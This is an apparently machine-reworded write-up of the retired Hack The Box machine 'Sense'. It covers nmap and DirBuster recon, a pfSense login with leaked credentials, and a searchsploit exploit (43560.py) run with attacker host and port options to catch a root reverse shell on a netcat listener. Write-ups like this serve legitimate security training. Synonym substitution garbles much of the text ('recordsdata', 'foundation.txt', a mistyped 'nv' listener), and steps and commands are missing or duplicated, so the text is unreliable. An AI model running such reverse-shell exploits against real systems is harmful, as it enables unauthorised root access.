Keep Calm and Hack The Box
Hack The Box (HTB) is a web based platform that means that you can take a look at your penetration testing expertise.
It comprises a number of challenges which can be consistently up to date. Some of them simulate actual world situations and a few of them lean extra in the direction of a CTF model of problem.
Note: Only write-ups of retired HTB machines are allowed.
Sense is pretty easy general. It demonstrates the dangers of unhealthy password practices in addition to exposing inner recordsdata on a public dealing with system.
We will use the next instruments to pawn the field on a Kali Linux field:
Let’s get began!
Step 1 – Reconnaissance
The first step earlier than exploiting a machine is to perform a little little bit of scanning and reconnaissance.
This is without doubt one of the most vital components as it can decide what you possibly can attempt to exploit afterwards. It is at all times higher to spend extra time on this section to get as a lot data as you possibly can.
I’ll use Nmap (Network Mapper). Nmap is a free and open supply utility for community discovery and safety auditing.
It makes use of uncooked IP packets to find out what hosts can be found on the community, what providers these hosts are providing, what working programs they’re operating, what sort of packet filters/firewalls are in use, and dozens of different traits.
There are many instructions you should utilize with this instrument to scan the community. If you need to study extra about it, you possibly can take a look on the documentation right here.
I take advantage of the next command to carry out an intensive scan:
nmap -A -v 10.10.10.60
-A: Enables OS detection, model detection, script scanning, and traceroute
-v: Increases verbosity degree
sense.htb: hostname for the Sense field
If you discover the outcomes slightly bit too overwhelming, you possibly can do that:
We can see that there are 2 open ports together with:
Port 80, most frequently utilized by Hypertext Transfer Protocol (HTTP)
Port 443, customary port for all secured HTTP site visitors
Still within the scanning and reconnaissance section, I now use DirBuster. DirBuster is a multi threaded Java utility designed to brute pressure directories and recordsdata names on net/utility servers.
You can launch DirBuster by typing this command on the terminal:
or by looking out the applying:
The utility appears to be like like this, the place you possibly can specify the goal URL. In our case it will likely be https://10.10.10.60. You can choose a wordlist with the listing of dirs/recordsdata by clicking the Browse button:
I take advantage of the directory-list-2.3-medium.txt for this search. We can see some attention-grabbing recordsdata right here:
Step 2 – Visiting the recordsdata we received from the recon section
Let’s navigate to the changelog.txt file. We’re getting extra data round some safety changelog, together with patching vulnerabilities and timeline.
Another attention-grabbing file is system-users.txt which does include a username and a sign for the password.
Step 3 – Visiting the online web page
Let’s navigate to the web site. We see a pfSense panel.
pfSense is an open sourcefirewall/router laptop software program distribution primarily based on FreeBSD. It is put in on a bodily laptop or a digital machine to make a devoted firewall/router for a community. It will be configured and upgraded via a web-based interface, and requires no data of the underlying FreeBSD system to handle – Wikipedia
Let’s Google to see if we are able to discover the default username and password for pfSense. Bingo! We do discover some documentation on Netgate Docs.
I attempt the username Rohit and the password pfsense on the login web page and I’m in! I take a look on the dashboard and different data I might collect. We can see which particular model we’re on – 2.1.3-RELEASE (amd64).
Step 4 – Looking for an exploit
I take advantage of Searchsploit to verify if there’s any recognized exploit. Searchsploit is a command line search instrument for Exploit Database.
I take advantage of the next command:
I get extra particulars on an exploit with:
searchsploit -x 43560.py
You may also verify the Exploit Database to seek out the identical exploit.
I get extra data with:
searchsploit -p 43560.py
I can see the place it’s situated on my Kali field. I copy the file in my Sense folder with:
cp /usr/share/exploitdb/exploits/linux/distant/43560.py .
and to verify if it has been copied on this folder:
On one terminal (proper facet) I arrange a listener with:
nv -nvlp 1234
I then arrange the exploit (left facet) with:
python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.13 --lport 1234 --username rohit --password pfsense
I received a shell as root!
I begin gathering some fundamental data. id returns the true person ID of the calling course of.
Step 5 – Looking for the person.txt flag
I navigate to the rohit folder from residence.
I can listing all of the recordsdata/folders with the next command:
I then transfer to the residence folder with:
And I discover the person flag! I verify the contents of the file with:
Step 5 – Looking for the foundation.txt flag
Let’s discover the foundation flag now. I navigate as much as root.
I discover the foundation.txt file and verify its content material with:
Congrats! You discovered each flags.
- Do not retailer delicate data comparable to login credentials or your patching standing on a plaintext file on the webserver
- The pfsense utility needs to be patched to newest
- Make positive to alter the default password once you’re establishing new purposes/servers/platforms
- Apply the principle of least privilege to all of your programs and providers
Please don’t hesitate to ask questions or share with your mates 🙂
You can see extra articles from the sequence Keep Calm and Hack the Box right here.
And do not forget to #GetSecure, #BeSecure & #StaySecure!